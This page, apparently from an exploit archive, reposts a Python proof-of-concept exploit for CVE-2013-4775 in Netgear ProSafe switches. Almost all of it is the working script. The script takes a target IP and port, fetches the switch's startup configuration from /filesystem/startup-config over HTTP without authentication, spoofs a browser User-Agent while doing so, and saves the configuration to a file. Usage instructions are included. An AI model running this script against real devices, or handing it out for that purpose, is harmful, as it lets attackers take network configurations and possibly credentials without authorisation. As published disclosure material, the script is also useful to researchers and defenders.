Home / exploitsPDF  

Netgear ProSafe Information Disclosure Vulnerability Exploit

Posted on 23 August 2013

<pre>import sys, getopt, urllib2
  
  
__version__ = &quot;0.1&quot;
__author__ = &quot;Juan J. Guelfo, Encripto AS (post@encripto.no)&quot;
  
  
# Prints title and other header info
def header():
    print &quot;&quot;
    print &quot; ================================================================= &quot;
    print &quot;|  Netgear ProSafe - CVE-2013-4775 PoC 				  |&quot;.format(__version__)
    print &quot;|  by {0}		  |&quot;.format(__author__)
    print &quot; ================================================================= &quot;
    print &quot;&quot;
  
      
# Prints help    
def help():
    header()
    print &quot;&quot;&quot;
   Usage: python CVE-2013-4775.py [mandatory options]
  
   Mandatory options:
       -t target               ...Target IP address
       -p port                 ...Port where the HTTP admin interface is listening on
       -o file                 ...Output file where the config will be written to
          
   Example:
       python CVE-2013-4775.py -t 192.168.0.1 -p 80 -o output.txt
    &quot;&quot;&quot;
    sys.exit(0) 
      
      
      
if __name__ == '__main__':
      
    #Parse options
    try:
        options, args = getopt.getopt(sys.argv[1:], &quot;t:p:o:&quot;, [&quot;target=&quot;, &quot;port=&quot;, &quot;output=&quot;])
  
    except getopt.GetoptError, err:
        header()
        print &quot;
[-] Error: {0}.
&quot;.format(str(err))
        sys.exit(1)
      
    if not options:
        help()
      
    target = None
    port = None
    output = None
    reset = None
    for opt, arg in options:
        if opt in (&quot;-t&quot;):
            target = arg
          
        if opt in (&quot;-p&quot;):
            port = arg    
              
        if opt in (&quot;-o&quot;):
            output = arg  
              
    #Option input validation
    if not target or not port or not output:
        help()
        print &quot;[-] Error: Incorrect syntax.
&quot;
        sys.exit(1)
      
    header()
    print &quot;[+] Trying to connect to {0}:{1}...&quot;.format(target, port)
    headers = { &quot;User-Agent&quot; : &quot;Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)&quot; }
  
    try:
        # Get the startup config via HTTP admin interface
        r = urllib2.Request(&quot;http://%s:%s/filesystem/startup-config&quot; % (target, port), None, headers)
        startup_config = urllib2.urlopen(r).read()
        print &quot;[+] Connected...&quot;
          
        # Write results to output file
        print &quot;[+] Writing startup config to {0}...
&quot;.format(output)
        fw = open(output, 'w')
        fw.write(startup_config)
        fw.close()
      
    except urllib2.URLError:
        print &quot;[-] Error: The connection could not be established.
&quot;
          
    except IOError as e:
        print &quot;[-] Error: {0}...
&quot;.format(e.strerror)
  
    sys.exit(0)
</pre>

 

TOP

Malware :

Exploits :